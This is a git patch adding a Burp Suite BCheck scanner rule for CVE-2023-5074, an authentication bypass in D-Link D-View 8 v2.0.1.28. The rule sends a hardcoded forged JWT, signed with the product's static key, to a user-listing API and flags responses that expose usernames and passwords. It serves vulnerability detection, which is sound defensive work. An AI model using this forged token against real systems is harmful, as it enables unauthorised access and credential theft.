From 0cd321326f7bf5c987afa4a76e63e6f37db8d369 Mon Sep 17 00:00:00 2001
From: j0hnZ3RA <jpee.assis@icloud.com>
Date: Mon, 2 Oct 2023 23:19:03 -0300
Subject: [PATCH] CVE-2023-5074 D-Link D-View 8  v2.0.1.28 - Authentication
 Bypass

---
 ...  v2.0.1.28 - Authentication Bypass.bcheck | 27 +++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 vulnerabilities-CVEd/CVE-2023-5074 D-Link D-View 8  v2.0.1.28 - Authentication Bypass.bcheck

diff --git a/vulnerabilities-CVEd/CVE-2023-5074 D-Link D-View 8  v2.0.1.28 - Authentication Bypass.bcheck b/vulnerabilities-CVEd/CVE-2023-5074 D-Link D-View 8  v2.0.1.28 - Authentication Bypass.bcheck
new file mode 100644
index 0000000..959e7af
--- /dev/null
+++ b/vulnerabilities-CVEd/CVE-2023-5074 D-Link D-View 8  v2.0.1.28 - Authentication Bypass.bcheck	
@@ -0,0 +1,27 @@
+metadata:
+    language: v1-beta
+    name: "CVE-2023-5074 D-Link D-View 8 v2.0.1.28 - Authentication Bypass"
+    description: "Check for CVE-2023-5074"
+    author: "Joao Paulo Assis (j0hnZ3RA)"
+    tags: "CVE-2023-5074, D-Link, auth-bypass"
+
+
+define:
+    potential_path = "/dview8/api/usersByLevel"
+
+
+given host then
+    send request called check:
+        method: "GET"
+        path: {potential_path}
+        headers:
+            "Authorization": "eyJhbGciOiAiSFMyNTYiLCJ0eXAiOiAiand0In0.eyJvcmdJZCI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODA5YWEiLCJ1c2VySWQiOiAiNTkxNzFkNTYtZTZiNC00Nzg5LTkwZmYtYTdhMjdmZDQ4NTQ4IiwidHlwZSI6IDMsImtleSI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODkwYmIiLCJpYXQiOiAxNjg2NzY1MTk4LCJqdGkiOiAiZmRhOGU1YzNlNWY1MTQ5MDMzZThiM2FkNWI3ZDhjMjUiLCJuYmYiOiAxNjg2NzYxNTk4LCJleHAiOiAxODQ0NDQ1MTk4fQ.5swhQdiev4r8ZDNkJAFVkGfRTIaUQlwVue2AI18CrcI"
+
+
+    if {check.response.status_code} is "200" and "userName" in {check.response.body} and "passWord" in {check.response.body} and "isEmailActivate" in {check.response.body} and "application/json" in {check.response.headers} then
+        report issue:
+            severity: high
+            confidence: certain
+            detail: "Use of a static key to protect a JWT token used in user authentication can allow for an authentication bypass in D-Link D-View 8 v2.0.1.28."
+            remediation: "Upgrade to the latest version to mitigate this vulnerability."
+    end if
\ No newline at end of file